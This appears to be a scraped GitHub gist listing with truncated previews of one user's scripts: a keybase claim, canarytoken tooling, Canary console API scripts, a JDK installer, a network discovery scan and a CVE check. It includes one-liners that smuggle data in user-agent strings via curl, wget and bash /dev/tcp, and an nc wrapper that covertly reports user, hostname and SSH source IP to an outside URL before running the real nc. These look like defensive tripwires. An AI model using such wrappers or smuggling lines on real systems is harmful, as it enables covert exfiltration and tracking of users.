I hereby claim:
- I am sawaba on github.
- I am adriansanabria (https://keybase.io/adriansanabria) on keybase.
- I have a public key ASB_775JHuSPY2VjHpo6kYDsJCI74ICzkgipLHiMLNCSngo
To claim this, I am signing this object:
curl -s -A "smuggled message" http://canarytokens.com/tokenurl | |
wget -U "smuggled message" http://canarytokens.com/tokenurl | |
exec 3<>/dev/tcp/canarytokens.com/80 | |
echo -e "GET /articles/traffic/guln4qekd7zjfd4thw5sw48uh/post.jsp HTTP/1.1\r\nUser-Agent: If i trip my own token, i can pass it any useragent info i want to, effectively smuggling data in a token\r\nHost: canarytokens.com\r\nAccept: */*\r\n\r\n">&3 |
declare -a sshclient | |
sshclient=($SSH_CLIENT) | |
args="$@" | |
curl -s -A "Someone just ran nc $args as User:$USER on Hostname:$HOSTNAME from SourceIP: ${sshclient[0]}" http://7c589debfgpn.o3n.io/files/dkgs6rpqh7nyjrf1hr1pabc7u/logo.gif > /dev/null | |
/bin/nc "$@" |
# Generate AWS Creds 0.1 | |
# canarygen_awscreds.py | |
# | |
# This is the "auto" version of this script. Run it unattended and it will | |
# automatically grab username and hostname variables from the system it is | |
# run on. | |
# | |
# PREREQS | |
# python 3 | |
# pip3 install canarytools |
import requests | |
import sys | |
import re | |
def main(args): | |
if len(args) < 2: | |
print("usage: python delete_tokens.py <console_url> <api_key>") | |
auth = args[1] | |
console = args[0] | |
get_url = "{base}/api/v1/canarytokens/fetch?auth_token={auth}".format( |
@echo off | |
REM Test script to generate AWS creds | |
REM Requires curl and jq. Customize name/path to EXEs below. | |
set curl=curl | |
set jq=jq-win64.exe | |
REM Grab the date and time for creating unique files | |
for /f "tokens=1,2,3,4 delims=/ " %%a in ('date /t') do set currdate=%%d%%c%%b | |
for /f "tokens=1,2,3,4 delims=.:" %%a in ("%time%") do set currtime=%%a%%b%%c |
#!/bin/bash | |
# Create a CSV with the last week's worth of alerts from your Canary console | |
# Requires curl and jq to be in the path | |
# Set this variable to your API token | |
export token=deadbeef12345678 | |
# Customize this variable to match your console URL | |
export console=ab123456.canary.tools |
#!/bin/bash | |
# This script adapted from an older post on StackOverflow by user fieldju | |
# https://stackoverflow.com/questions/36478741/installing-oracle-jdk-on-windows-subsystem-for-linux | |
# The script was for JDK 8. | |
# Due to major changes with JDK 11 (no JRE, no Derby, Unlimited Strength included), it was necessary to update the entire script. | |
set -ex | |
# UPDATE THESE URLs (this one updated as of 2019-03-06) | |
export JDK_URL=http://download.oracle.com/otn-pub/java/jdk/11.0.2+9/f51449fcd52f4d52b93a989c5c56ed3c/jdk-11.0.2_linux-x64_bin.tar.gz |
@echo off | |
goto begin | |
+-----------------------------------------------------------------------------+ | |
| Internal Network Discovery Scan | | |
| | | |
| DESCRIPTION: This script discovers NETWORKS, not hosts. It attempts to find | | |
| every class C in use throughout the enterprise. Note that, on larger ranges,| | |
| we're sampling IPs to save time. This is a calculated time/accuracy tradeoff| | |
| | |
@echo off | |
REM Local Windows check to ensure we're safe from CVE-2017-11937 | |
REM https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11937 | |
cls | |
ECHO. | |
ECHO CVE-2017-11937 Vulnerability Check version 1.0 | |
ECHO Checking to make sure your antivirus isn't going to sell you out to cyberbaddies. | |
ECHO The last vulnerable version was 1.1.14306.0 - anything newer should be safe. | |
ECHO. |
I hereby claim:
To claim this, I am signing this object: